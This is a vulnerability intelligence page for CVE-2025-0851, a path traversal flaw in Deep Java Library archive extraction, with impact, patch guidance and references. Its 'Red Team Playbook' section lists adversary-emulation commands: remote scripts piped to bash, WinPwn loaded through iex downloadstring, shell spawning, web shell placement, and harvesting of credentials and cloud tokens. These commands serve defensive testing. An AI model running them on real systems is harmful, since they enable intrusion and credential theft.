CVE-2025-0851
Overview
This vulnerability is a path traversal flaw affecting the AWS DeepJavaLibrary's ZipUtils.unzip and TarUtils.untar functions. The root cause lies in insufficient validation of archive entry paths during extraction, allowing crafted archive files to escape the intended extraction directory. This affects the archive extraction components responsible for decompressing ZIP and TAR files on all supported platforms.
Vulnerability Description
A path traversal issue in ZipUtils.unzip and TarUtils.untar in Deep Java Library (DJL) on all platforms allows a bad actor to write files to arbitrary locations.
Impact
An unauthenticated attacker can exploit this vulnerability by supplying a maliciously crafted archive to the vulnerable extraction functions, resulting in arbitrary file writes to locations outside the intended directory. This can lead to unauthorized modification or overwriting of critical system or application files, potentially enabling further compromise or disruption. The attack requires no user interaction and can be executed remotely if the archive processing is exposed, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N, with high confidentiality, integrity, and availability impacts.
Solution
Users should upgrade AWS DeepJavaLibrary to version 0.31.1 or later, which includes patches addressing this path traversal issue as detailed in the vendor advisory AWS-2025-003 (https://aws.amazon.com/security/security-bulletins/AWS-2025-003/). The GitHub release notes for v0.31.1 (https://github.com/deepjavalibrary/djl/releases/tag/v0.31.1) provide the updated patched versions. No additional workarounds are specified by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Deep Java Library (DJL) arises from a path traversal issue within the ZipUtils.unzip and TarUtils.untar functions. This flaw allows an attacker to manipulate file paths in such a way that they can write files to arbitrary locations on the file system. When these utility functions are used to extract compressed files, the absence of proper validation and sanitization of file paths can lead to unauthorized file creation or overwriting. Attackers can exploit this vulnerability by crafting specially designed zip or tar files that contain malicious payloads, which, when extracted, can lead to severe consequences, including data corruption, unauthorized access to sensitive files, or even system compromise.
The primary attack vector involves the delivery of a maliciously crafted archive file to a target application that utilizes the affected library for file extraction. Once the file is processed, the attacker can leverage the path traversal vulnerability to write files to locations outside the intended directory structure. For instance, an attacker could overwrite critical configuration files or inject malicious scripts into web directories, leading to remote code execution or further exploitation of the system. Additionally, this vulnerability can be exploited in scenarios involving web applications, cloud services, or any software that relies on the DJL for handling compressed files, making it a versatile threat across various platforms.
The real-world impact of this vulnerability is significant, especially for organizations that rely on the Deep Java Library for file handling in their applications. The high CVSS score of 9.8 indicates a critical risk, suggesting that successful exploitation could lead to severe consequences, including data breaches, loss of integrity, and potential downtime. Businesses may face regulatory repercussions, financial losses, and damage to their reputation if sensitive data is compromised or if their systems are used as a launchpad for further attacks. Moreover, the ability to write files to arbitrary locations can facilitate lateral movement within a network, allowing attackers to escalate privileges and gain deeper access to sensitive systems.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching the Deep Java Library is crucial to ensure that any known vulnerabilities are addressed promptly. Additionally, developers should incorporate input validation and sanitization mechanisms to prevent path traversal attacks. Implementing strict file extraction policies, such as limiting the directories to which files can be extracted, can further reduce the risk. Employing security tools that monitor file system changes and alert administrators to suspicious activities can also aid in early detection of exploitation attempts.
In conclusion, the path traversal vulnerability in the Deep Java Library presents a critical threat that can be exploited to gain unauthorized access to a system's file structure. The potential for significant real-world impact necessitates immediate attention from organizations utilizing this library. By prioritizing timely updates, enforcing strict validation measures, and adopting comprehensive security monitoring practices, businesses can effectively mitigate the risks associated with this vulnerability and protect their assets from potential exploitation.
Recent analysis from CSURFACE threat intelligence indicates a significant increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-0851, rising by over 40% to place this vulnerability near the top percentile of predicted exploitation likelihood. This upward adjustment reflects growing confidence in the feasibility and imminence of exploitation attempts, despite the absence of new proof-of-concept exploits emerging in public repositories. Our telemetry shows the risk environment remains stable but elevated, underscoring that threat actors are increasingly prioritizing this path traversal flaw in the Deep Java Library. For defenders, this shift signals an urgent need to reassess exposure and monitoring strategies, as the heightened EPSS score correlates with a greater probability of active exploitation campaigns. Consequently, the overall threat level for CVE-2025-0851 has escalated from critical to a more imminent and actionable risk, warranting intensified vigilance within affected environments.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
skrkcb2/CVE-2025-0851
|
skrkcb2 | 1 | 1 | 2025-02-17 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-597 | Absolute Path Traversal |
36%
|
— | — |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-0851 |
| aws.amazon.com |
GitHub CVE
vendor-advisory
|
https://aws.amazon.com/security/security-bulletins/AWS-2025-003/ |
| github.com |
GitHub CVE
third-party-advisory
|
https://github.com/deepjavalibrary/djl/security/advisories/GHSA-jcrp-x7w3-ffmg |
| github.com |
GitHub CVE
patch
|
https://github.com/deepjavalibrary/djl/releases/tag/v0.31.1 |